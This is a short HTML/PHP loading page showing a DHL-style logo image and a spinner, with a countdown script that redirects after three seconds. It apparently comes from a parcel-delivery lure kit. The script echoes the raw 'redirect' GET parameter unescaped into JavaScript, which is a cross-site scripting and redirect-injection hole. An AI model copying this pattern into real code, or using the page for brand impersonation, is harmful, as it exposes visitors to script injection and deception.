

<html>
<style>
@import url('https://fonts.googleapis.com/css2?family=Rubik&display=swap');

#countdown{
font-family: 'Rubik', sans-serif;

}

/* generated by https://loading.io/ */

</style>
<head>
    <meta name="viewport" content="width=device-width"/>

	</head>
<body >
	<div style="margin-top: 20%">
<center><img  style=" width: 150px; -webkit-animation: breathing 1s ease-out infinite normal;
    animation: breathing 1s ease-out infinite normal;" src="../assets/img/dhlz.png">

</center></div>

<div style="">
<center>
<div style="margin-top: 25px;" class="loadingio-spinner-rolling-jz7nx6q84p"><div class="ldio-qm8a5lnyc7m">
<div></div>
</div></div>
  <style>
        @-webkit-keyframes breathing {
  0% {
    -webkit-transform: scale(0.9);
    transform: scale(0.9);
  }

  25% {
    -webkit-transform: scale(1);
    transform: scale(1);
  }

  60% {
    -webkit-transform: scale(0.9);
    transform: scale(0.9);
  }

  100% {
    -webkit-transform: scale(0.9);
    transform: scale(0.9);
  }
}

@keyframes breathing {
  0% {
    -webkit-transform: scale(0.9);
    -ms-transform: scale(0.9);
    transform: scale(0.9);
  }

  25% {
    -webkit-transform: scale(1);
    -ms-transform: scale(1);
    transform: scale(1);
  }

  60% {
    -webkit-transform: scale(0.9);
    -ms-transform: scale(0.9);
    transform: scale(0.9);
  }

  100% {
    -webkit-transform: scale(0.9);
    -ms-transform: scale(0.9);
    transform: scale(0.9);
  }
}

      </style>

<style type="text/css">
@keyframes ldio-qm8a5lnyc7m {
  0% { transform: translate(-50%,-50%) rotate(0deg); }
  100% { transform: translate(-50%,-50%) rotate(360deg); }
}
.ldio-qm8a5lnyc7m div {
  position: absolute;
  width: 60px;
  height: 60px;
  border: 10px solid #FFA500 ;
  border-top-color: transparent;
  border-radius: 50%;
}
.ldio-qm8a5lnyc7m div {
  animation: ldio-qm8a5lnyc7m 1s linear infinite;
  top: 50px;
  left: 50px
}
.loadingio-spinner-rolling-jz7nx6q84p {
  width: 34px;
  height: 34px;
  display: inline-block;
  overflow: hidden;
  background: none;
}
.ldio-qm8a5lnyc7m {
  width: 100%;
  height: 100%;
  position: relative;
  transform: translateZ(0) scale(0.34);
  backface-visibility: hidden;
  transform-origin: 0 0; /* see note above */
}
.ldio-qm8a5lnyc7m div { box-sizing: content-box; }
/* generated by https://loading.io/ */
</style>


<script type="text/javascript">
var timeleft = 3;
var downloadTimer = setInterval(function(){
  if(timeleft <= 0){
    clearInterval(downloadTimer);
    window.location.href = "<?php echo $_GET["redirect"]; ?>.php";
  }
  timeleft -= 1;
}, 1000);



</script>



</center>
	</div>
	</body>

</html>

